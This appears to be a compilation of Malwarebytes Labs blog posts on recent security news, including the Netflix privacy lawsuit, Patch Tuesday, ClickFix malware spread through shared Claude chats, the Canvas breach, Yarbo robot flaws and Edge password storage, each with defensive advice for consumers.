Malware Bytes

Attorney General (AG) of Texas Ken Paxton announced that he sued Netflix for spying on Texans, including children, and collecting users’ data without their knowledge or consent.  

The suit alleges Netflix secretly tracks and monetizes detailed viewing behavior of users, including children, while misleading users about its data practices. The case could reshape how Netflix collects data, targets ads, and designs “addictive” features, especially for minors. 

According to the complaint, Netflix allegedly ran what the AG’s office calls a “surveillance program,” turning every click, pause, and binge session into data that could be sold to advertisers and data brokers.

Netflix firmly denies the accusations, calling the lawsuit “inaccurate” and claiming it complies with privacy laws wherever it operates. Spokesperson Jamil Walker said:

“The suit lacks merit and is based on inaccurate and distorted information.”

But regardless of how this specific case plays out, the lawsuit raises a bigger question for all subscribers: Just how much does your streaming service really know about you, and what does it do with that information?

The Texas complaint paints a picture of Netflix as a data company first and a streaming service second. Paxton’s office even describes Netflix as:

“A logging company that records and monetizes billions of behavioral events—and occasionally streams movies.”

The complaint also references a 2024 ruling by the Dutch Data Protection Authority, which said Netflix does not disclose the true scale or granularity of this data collection. The lawsuit claims Netflix did not just use this data internally for recommendations but also sold it to commercial data brokers and ad tech companies, generating “billions of dollars” annually. 

The AG wants to stop the unlawful collection and disclosure of user data, require Netflix to disable autoplay by default on kid’s profiles, and impose other injunctive relief and civil penalties.

For customers, the main consequences could include potential changes to data collection, targeted advertising, autoplay defaults, and clearer consent and privacy controls. For subscribers on Netflix’s ad‑supported plans, this could slightly change how “personal” ads feel, at least in jurisdictions where regulators clamp down.

Plus, the lawsuit serves as a reminder that streaming habits may be far more trackable than users assumed. Even if Netflix ultimately wins or settles without admitting wrongdoing, the lawsuit puts a spotlight on what the company collects and why.

Netflix privacy and account settings

It will probably take a while before this lawsuit leads to any changes. But there are a few things you can do to protect your privacy:

• Netflix lets users view and remove entries from their watch history per profile, which can reduce how much historical behavior feeds into recommendations.
• Where available, turn off non‑essential marketing emails or in‑app promotions that rely on behavioral profiling.
• Use the parental controls Netflix offers you and turn off autoplay previews.

Basically, treat your Netflix account like any other online account: Review every profile, remove old ones, and take five minutes to walk through the privacy- and playback‑related options.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

This month’s Patch Tuesday remedies 137 security vulnerabilities, including 31 marked critical by Microsoft, with no zero-days actively exploited in the wild.

Microsoft defines a zero-day as “a flaw in software for which no official patch or security update is available yet.” This month, Microsoft has not observed any included vulnerability being exploited in production environments.

Still, this release is far from low-risk. A large chunk of the critical bugs allow remote code execution (RCE) across Windows services, Office, Azure, SharePoint, and graphics components. That means attackers who trick a user into opening a malicious document or lure them into connecting to a malicious service could gain full control of a system.

Two vulnerabilities to prioritize

From that list, we selected two that look like they could cause some trouble.

First is CVE-2026-40361, which has a CVSS score of 8.4 out of 10. It’s described as a critical use-after-free vulnerability in Microsoft Word that could allow an attacker to execute code locally on the affected system.

Use-after-free is a class of vulnerability caused by incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker may be able to use the error to manipulate the program.

So, if an attacker convinces a user to open a malicious Word document, or even previews the file, they could execute arbitrary code with the privileges of the current user. That’s often enough to install malware, steal credentials, or move laterally through a network.

Second is CVE-2026-35421 (CVSS score 7.8 out of 10). This is a critical heap-based buffer overflow in Windows Graphics Device Interface (GDI). A buffer overflow occurs when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. Microsoft notes:

“For this vulnerability to be exploited, a user would need to open or otherwise process a specially crafted Enhanced Metafile (EMF) file using Microsoft Paint. This action is necessary to trigger the affected graphics functionality in the Windows component.”

Real-time protection. Zero effort. 

TRY FREE

How to apply fixes and check if you’re protected

These updates fix security problems and keep your Windows PC protected. Here’s how to make sure you’re up to date:

1. Open Settings

• Click the Start button (the Windows logo at the bottom left of your screen).
• Click on Settings (it looks like a little gear).

2. Go to Windows Update

• In the Settings window, select Windows Update (usually at the bottom of the menu on the left).

3. Check for updates

• Click the button that says Check for updates.
• Windows will search for the latest Patch Tuesday updates.
• If you have selected to get the latest updates as soon as they’re available, you may see this under More options.
• In which case you may see a Restart required message. Restart your system and the update will complete.
  
• If not, continue with the steps below.

4. Download and Install If updates are found, they’ll start downloading automatically. Once complete, you’ll see a button that says Install or Restart now.

• Click Install if needed and follow any prompts. Your computer will usually need a restart to finish the update. If it does, click Restart now.

5. Double-check you’re up to date

• After restarting, go back to Windows Update and check again. If it says You’re up to date, you’re all set!

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Researchers found that cybercriminals are using sponsored search results and shared Claude chats to lure victims into a typical ClickFix attack to install malware on macOS devices.

ClickFix is a social engineering method that tricks users into infecting their own device with malware. Users are instructed to run specific commands that will download malware, usually an infostealer.

The researchers found that when users search for terms like “Claude Mac download,” they may see sponsored Google results that appear to go to the legitimate claude.ai domain.

In reality, the ads resolve to real Claude shared chats, set up to look like official “Claude Code on Mac” or Apple Support guides. Independent research by BleepingComputer found another chat serving the same purpose. The chat instructs victims to open Terminal and paste a base64‑encoded command, which pulls a loader shell script from attacker‑controlled infrastructure and runs it in memory.

The script then profiles the system, pulls down a second-stage payload and runs it through osascript, macOS’s built-in scripting engine. This gives the attacker remote code execution (RCE) without ever dropping a traditional application or binary.

This results in a MacSync‑style payload that harvests browser credentials, cookies, Keychain contents, and crypto wallet data, bundles it, and sends all that information over HTTP to attacker servers.

How to stay safe

Users running macOS Tahoe 26.4 and later will see warnings about possible ClickFix attacks, but other users still have to rely on common sense.

With ClickFix running rampant and inventing new methods all the time, it’s important to stay aware, cautious, and protected.

• Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy and paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
• Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand what the action does.
• Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
• Limit copy and paste for commands. Manually typing commands instead of copy and paste can reduce the risk of unknowingly running malicious payloads hidden in copied text.
• Secure your devices. Use an up-to-date, real-time anti-malware solution with web protection. Malwarebytes blocks connections to unsafe sites like these.
  
• Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected places helps maintain vigilance. Keep reading our blog!
• Stay away from sponsored ads in search results. Anyone can buy them and make them look legitimate.

Pro tip: The free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

UK anti-fraud non-profit Cifas just published research that should bother anyone who runs a business, or buys from one: One in eight workers at large enterprises have either sold their company login credentials or know someone who did.

The internet is awash with compromised credentials that employees use to access company systems. Threat intelligence company KELA tracked nearly 2.9 billion compromised credentials globally in 2025. Most of these come from phishing attacks and infostealers. But thanks to employees wanting to make a quick buck, cyber criminals can just make people an offer.

The insiders nobody’s watching

Cifas interviewed 2,000 employees of companies with at least 1,000 staff. Of these, 13% admitted to selling their corporate access credentials in the last 12 months, or knowing someone who did. Amazingly, as the report says, the sellers did so “often under the belief it’s harmless.”

Newsflash: Selling your account credentials isn’t harmless. Criminals want them so they can take over the account and do nefarious things with it. Account takeovers in the US surged 6% to over 78,000 last year, according to Verizon.

Many hijacked accounts are personal ones for services ranging from social media to online streaming sites, and of course bank accounts. But many others are accounts for business systems like Microsoft 365, Salesforce, and other platforms that hold sensitive company data. Those secrets are valuable commodities for criminals who can then trade them on the open market.

Your boss is more likely to sell than you

Ideally, this is where a common technique called “least-privilege access” should come in.

The idea is that a corporate online account should only have access to what it needs. So Jim in the canteen should have access to the food ordering system, but not to the entire customer database. That way, even if Jim’s account gets compromised, the worst the attackers could do is deprive you of sausages tomorrow.

The problem is that, according to the report, higher-ups are even more comfortable selling their account credentials than low-level employees. Thirty-two percent of senior managers find it justifiable, along with 36% of directors, 43% of C-suite executives, and, stunningly, four in five business owners. Their roles mean that even with least-privilege access, their accounts can still open routes to sensitive system functions and data.

This isn’t just a UK problem

The Cifas research is UK-specific, but that’s likely not where it ends. We’ve seen employees at several companies selling access to either company accounts or records. For example, cryptocurrency company Coinbase revealed last year that employees at a Bangladesh-based outsourcing company sold customer records to hackers.

Compromised credentials are widespread. Our own research found that in a single 30-day window, 111 Fortune 500 companies had employee credentials leaked. Long-term, 363 of those firms (that’s 73%) have lost control of at least one employee credential.

Employees selling their access credentials isn’t just bad for the companies that employ them. It’s also bad for customers.

When a director’s password goes up for sale, a customer file might not be far behind, although it likely won’t be the director selling it. Malwarebytes found that 91% of Fortune 500 companies have had their customers’ credentials leaked, and hijacked accounts are a great way to get at them.

So insider risk isn’t just a corporate issue. It’s also a consumer one. That makes us less likely to hand over our personal information to large enterprises without questioning why they need it.

Your name, address, and phone number are probably already for sale.  

Data brokers collect and sell your personal details to anyone willing to pay. Malwarebytes Personal Data Remover finds them and gets your information removed, then keeps watch so it stays that way. 

SCAN NOW

The Instructure/Canvas data breach that has dominated cybersecurity coverage recently has reached a new stage.

Millions of students had personal data stolen, with extortion group ShinyHunters claiming credit for the data breach and applying extra pressure for their ransom demands by bothering Canvas users directly.

Which seems to have paid off. On the Instructure web page about the recent data breach, a status update dated May 11, 26 says:

“We know that concerns about the potential publication of data related to this incident remain top of mind for many customers. We understand how unsettling situations like this can be, and protecting our community remains our top priority.

With that responsibility in mind, Instructure reached an agreement with the unauthorized actor involved in this incident.”

This implies that Instructure has paid ShinyHunters. At least some of that money will almost certainly go toward funding future cybercrime operations. Whether companies should ever pay ransomware or extortion demands remains a contentious debate, and that is not an argument I want to reignite here.

What I don’t understand is the next phrase in the update:

“The data was returned to us.”

While that may be intended to sound reassuring, in cybersecurity, data is not a borrowed laptop or a misplaced folder. Once copied, it can be copied again, and again.

That matters because the incident wasn’t just about temporary access. Instructure said the unauthorized access involved usernames, email addresses, course names, enrollment information, and messages.

Data cannot simply be “returned”

So, when a company says the data was “returned” and “shred logs” were provided, the real question is not whether the attackers still possess the original files. It is whether copies were made, whether those copies were shared and with whom. So, in essence, whether the breach’s downstream risks have actually been eliminated. While these types of cybercriminals tend to operate on trust, digital data does not come with a guaranteed recall function.

The good news is that Instructure says no passwords, dates of birth, government identifiers, or financial information were involved. But names, email addresses, course details, and private messages are still enough to fuel highly targeted phishing and social engineering long after the headlines fade.

For students and families, the practical advice from our original blog still applies:

• Reset Canvas‑related passwords
• Enable multi‑factor authentication where possible
• Monitor financial and credit activity as children get older
• Stay wary of highly personalized phishing that references real schools, courses, or teachers

Your name, address, and phone number are probably already for sale.  

Data brokers collect and sell your personal details to anyone willing to pay. Malwarebytes Personal Data Remover finds them and gets your information removed, then keeps watch so it stays that way. 

SCAN NOW

A researcher found that Yarbo yard robots came with a host of vulnerabilities which, among others, allowed an attacker to harvest WiFi passwords.

Security researcher Andreas Makris found he could remotely hijack thousands of Yarbo yard robots worldwide, and proved it by having his mower run him over. The root cause was a cluster of “legacy” design choices: every robot shared the same hardcoded root password, remote tunnels were left open, and Message Queuing Telemetry Transport (MQTT) messaging was so weakly protected that once you had one device, you effectively had the worldwide fleet.

An attacker could pull GPS coordinates, email addresses, and Wi‑Fi passwords, turn cameras into remote spying tools, and even re‑arm the mower after someone hit the emergency stop. 

All of this was enabled by a persistent backdoor tunnel that users could neither see nor meaningfully control. The risks fell into three very different buckets:

• A heavy mower with remotely controllable blades and an emergency stop that can be bypassed is a real-world safety hazard.
• Exposed telemetry meant attackers could map where devices were, see who owned them, and in some reports even view camera feeds.
• Network abuse through shared root credentials meant compromised robots could scan local networks, steal more data, or be folded into a botnet.

Yarbo’s public response is unusually detailed for a consumer Internet of Things (IoT) vendor. It’s also refreshingly blunt in admitting that the researcher’s core findings were accurate. The company temporarily disabled the remote diagnostic tunnels, reset root passwords, locked down unauthenticated endpoints, and began ripping out unnecessary legacy access paths.

More importantly, Yarbo promises structural changes:

• Unique per‑device credentials.
• Over-the-Air  (OTA) credential rotation.
• Audited, allowlist‑based remote diagnostics.
• Dedicated security contact, with a possible bug bounty to follow.

That is the sort of long‑term security hygiene we rarely see spelled out this clearly after an IoT fiasco.

From a disclosure and remediation standpoint, Yarbo is doing many things right: crediting the researcher, apologizing, prioritizing fixes, and explaining both short‑term patches and long‑term architectural changes in human language. For buyers of connected devices with blades, that level of transparency is a positive precedent.

But Yarbo has explicitly chosen to keep a remote access tunnel, although wrapped in better controls and logs, instead of offering users the option to remove or fully opt out of it.

How to secure IoT devices

The vulnerabilities uncovered in the Yarbo case present an almost a live-action demo of what the IoT Cybersecurity Improvement Act is trying to prevent in US government deployments. While the Act doesn’t apply to Yarbo directly, its National Institute of Standards and Technology (NIST)-driven requirements map neatly onto what went wrong here.

So, it’s still up to users to make sure you:

• Change the default credentials.
• Check if the vendor will make updates available and how easy it is to install them before buying an IoT product. And then install the updates when available.
• If you can, put your IoT devices on a separate network. Use a guest Wi‑Fi or separate VLAN when available.
• Disable what you don’t need. Turn off UPnP, remote access, cloud control, and unnecessary services if you’re not actively using them.
• If your router or security suite logs connections from IoT devices, skim those logs for odd spikes or unknown destinations.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Last week on Malwarebytes Labs:

• Microsoft says Edge’s plaintext password behavior is “by design”
• ShinyHunters escalates Canvas attacks with school login defacements
• Massive AI investment scam network spans 15,500 domains
• If a fake moustache can fool age checks, is the Online Safety Act working?
• Google Chrome’s silent 4GB AI download problem
• Attackers adopt JavaScript runtime Bun to spread NWHStealer
• Millions of students’ personal data stolen in major education breach
• Update WhatsApp now: Two new flaws could expose you to malicious files
• Cyberattacks are raising your prices (Lock and Code S07E09)
• Thousands of Facebook accounts stolen by phishing emails sent through Google
• The 2026 World Cup scam economy is already running before the first whistle

Stay safe!

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Some time ago, we discussed whether you should allow your browser to remember your passwords.

In that article we mentioned the importance of encryption.

“With a browser password manager, someone with access to your browser could see your passwords in clear text, although Windows can be set to ask for authentication (the same you use at startup of your device).”

The typical behavior of browser password managers is to store passwords encrypted on disk, tied to your user account, and protected by the operating system.

But recently, a security researcher systematically tested every major Chromium-based browser for how they handle credentials in memory. The researcher found that Edge was the only one loading the entire password vault into plaintext process memory at startup, where it remains for the duration of the session.  

Chrome and other Chromium browsers were observed to only decrypt a password when needed (autofill or “show password”), not the whole vault, and to use mechanisms like app‑bound encryption for keys. Edge does not use those protections in this context.

So, the researcher decided to write a proof-of-concept (PoC) demonstrating that accessing that vault doesn’t rely on zero-days or complex exploitation. It relies on the relatively simple ability to read process memory, which does require elevated privileges.

But when the researcher reported the issue to Microsoft, the response was underwhelming. The company’s official response was that the behavior is “by design.” The reasoning most likely is that this behavior speeds up sign‑in and autofill, and attackers would already need a compromised machine or elevated access to read RAM, which Microsoft treats as out of scope for this design decision.

Which is basically true. An attacker already needs significant foothold: for example, code execution on the box and the ability to read Edge’s process memory, often requiring elevated privileges. This is not a remote, unauthenticated bug in the browser, but the design makes post‑compromise credential harvesting easier. And it’s a capability many infostealers already have.

It’s just another thing an attacker can do once they’ve compromised your machine. Combined with this academic study from 2024, which found many password managers leak plaintext passwords into memory under some conditions, it leads us to repeat our advice.

Should you allow your browser to remember your passwords?

Your browser password manager gives you ease of use, but that costs you some security. Of course, password managers aren’t foolproof either, so it’s important to decide for yourself where you store your passwords.

If you’re confident the website is safe, and anyone that can access it under your account won’t learn anything new, feel free to store the password in your browser, but disable autofill so you stay in control.

Use MFA where possible. It enormously reduces the risk should someone get hold of your password. And refrain from using the browser password manager to store your credit card details or other sensitive personally identifiable information, such as medical information.

But we’d add that, among the major browsers, Edge appears to be the weakest option if you still choose to use a built‑in password manager.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Days after confirming a major data breach, Instructure is now facing a second blow.

Earlier this week, Instructure confirmed a major data breach affecting its cloud‑hosted Canvas environment, with the ShinyHunters group claiming it stole hundreds of millions of records tied to thousands of schools and universities worldwide. As discussed in our earlier blog, that incident involved data such as student and staff records, enrollment details, and private messages allegedly accessed through Canvas export features and APIs. At that stage, the focus was on large‑scale data theft and the long‑term risks for affected students and families, including identity fraud and highly targeted phishing.

According to new reporting, ShinyHunters has now hit Instructure again, this time moving from quiet data theft to very visible extortion. Using another vulnerability in Instructure’s systems, the attackers were able to modify Canvas login portals for hundreds of educational institutions, defacing both web logins and the Canvas app with an on‑screen ransom message.

Image credit: vx-underground

The message both claimed responsibility for the earlier breach and set a deadline of May 12 for Instructure and affected schools to contact the gang or risk the public release of stolen data.

This second wave matters for two reasons. First, it confirms that ShinyHunters still has meaningful access to Instructure’s environment, or at least to components that control the look and behavior of school login pages. Second, it marks a clear escalation in pressure tactics, from leaked claims and dark web posts to messages shown directly to students, parents, and staff trying to access their courses.

How to deal with this data breach

For students and families, the practical advice from our original blog still applies:

• Reset Canvas‑related passwords
• Enable multi‑factor authentication where possible
• Monitor financial and credit activity as children get older
• Stay wary of highly personalized phishing that references real schools, courses, or teachers

For schools and districts, this latest extortion campaign underlines the need to coordinate closely with Instructure, review single sign-on (SSO) integrations, and prepare clear communications so that any future defacements or data leaks do not catch staff and parents by surprise.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →